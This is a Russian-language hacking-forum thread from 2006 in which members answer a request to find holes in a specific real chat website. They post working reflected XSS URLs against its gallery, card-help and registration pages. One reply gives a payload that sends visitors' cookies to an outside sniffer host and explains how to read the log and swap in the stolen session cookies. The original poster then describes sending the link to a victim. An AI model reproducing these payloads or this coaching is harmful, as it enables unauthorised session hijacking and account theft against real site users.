Чаты найти уязвимости чата http://sibchat.ru

Discussion in 'Веб-уязвимости' started by Trentemoller, 22 Sep 2006.

  1. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Посмотрите чат http://sibchat.ru может что-нибудь можно с ним сделать...
    Спасибо второй раз.
     
  2. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    пассивная XSS:
    http://www.sibchat.ru/gallery.php?sid='><script>alert(/Kaban/)</script>
     
    2 people like this.
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Kaban, молодец. Ксс рабочая, проверял.
    http://www.sibchat.ru/gallery.php?sid='><script>alert(document.cookie)</script>
    Впринципе считаю вопрос исчерпаным. Тему пока что закрывать не буду, может сам ещё найду что нибудь, или другие выложут. Но за оффтоп буду ставить минусы.
     
  4. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    А что можно через Xss сделать, и дайте пожалуйста ссылку, где можно подробно об Xss узнать....
    Спасибо, что ответили...
     
  5. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Вот это почитай

    http://forum.antichat.ru/thread24312-xss.html
    http://forum.antichat.ru/thread20140.html
     
  6. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    И еще
    http://forum.antichat.ru/thread7083-%CD%E5%E1%EE%EB%FC%F8%EE%E9+faq+(XSS).html

    http://forum.antichat.ru/thread14424-%CA%E0%EA+%E7%E0%F8%E8%F4%F0%EE%E2%E0%F2%FC+%F1%F1%FB%EB%EA%F3.html

    http://forum.antichat.ru/thread19997-%DD%ED%F6%E8%EA%EB%EE%EF%E5%E4%E8%FF+%F3%FF%E7%E2%E8%EC%FB%F5+%F1%EA%F0%E8%EF%F2%EE%E2.html

    И еще по юзай гугл:
    Вот так задай гуглу. И лн тебе найдет!
     
  7. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    одни только xss
    http://www.sibchat.ru/card_help.php?sid=%22%3E%3Cscript%3Ealert()%3C/script%3E
    http://www.sibchat.ru/register.php?sid=%3C/script%3E%3Cscript%3Ealert()%3C/script%3E
     
    2 people like this.
  8. PSalm69

    PSalm69 [ радиоверсия ]

    Joined:
    12 Jul 2005
    Messages:
    891
    Likes Received:
    300
    Reputations:
    530
    Можно отсюда http://forum.chita.ru/
    Если версия форума реально 2.06 то топаем сюда http://www.securitylab.ru/vulnerability/203209.php
     
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    И ещё..
    Показывает comp_id, то есть можно предположить что для бана они используют comp_id.
    http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie)</script>
    -------------
    Здесь то же самое:
    http://www.sibchat.ru/register.php?sid="><script>alert(document.cookie)</script>
    Только ещё вылазиет такая бяка:
    -------------
    ЗЫ Все три ксс добавлю в f.a.q. по чатам
     
    #9 .Slip, 24 Sep 2006
    Last edited: 24 Sep 2006
  10. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Ответьте пожалуйста на такой вопрос. Куки когда считываются, куда они считываются, где их прочесть, то можно?
     
  11. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    в логе сниффера... /log.php (или как там у тебя...)
    в QUERY: session_id= pass_hash=
     
  12. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Тоисть это надо писать к примеру http://antichat.ru/cgi-bin/s.jpg?? если да, то между какими строчками этот лог вписывать?
     
  13. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    http://antichat.ru/cgi-bin/s.jpg - это сниффер, который ты вставляешь в скрипт...
    http://antichat.ru/sniff/log.php - это лог... в котором ты смотришь результаты...
     
  14. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Вот всё что было в ПМ, спрашивай по тексту, что тебе не понятно.
    =================================================
    http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie)</script>
    Если я правльно тебя понял, то ты про это. Вот одна из тех ксс. В теле тега <script> ты должен прописать путь на сниффер. Если использовать сниффер от античата, то запрос будет таким:
    http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
    Лог находится здесь: http://antichat.ru/sniff/log.php
    В поле QUERY должны высветится разнообразные символы. Это и есть куки. Потом с помощью Оперы или Кукиэдитора делаешь подмену куков, и всё. Можешь так же воспользоватся скриптом от Дрона: http://forum.antichat.ru/threadnav22898-1-10.html
    Всё. Дальше уже только нужен твой мозг.
     
  15. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Это получатся мне надо вписать сниффер вместо document.cookie? а жертва должна по ссылке пройти*?
     
  16. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Всё Slip вроде понял, буду юзать, я вот подумал может кто тел. даст я позвоню, проще будет...
     
  17. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Вот насчёт телефона эт вряд ли) Ладно, разбирайся. Будут вопросы, спрашивай.
     
  18. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Ну ладно с тел-ом забыли, вот ещё два вопроса, где взять куиэдитор не могу найти в нете, или как их подменить с помощью оперы?
     
  19. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Хм..... я отправил ссылку со сниффером, он сходил по ней а в логе ни чего нету? что это может быть?
     
  20. CyberPunk

    CyberPunk Elder - Старейшина

    Joined:
    25 May 2006
    Messages:
    115
    Likes Received:
    38
    Reputations:
    10
    Дык куки надо же послать. А не просто давать ссылку на gif файл :-D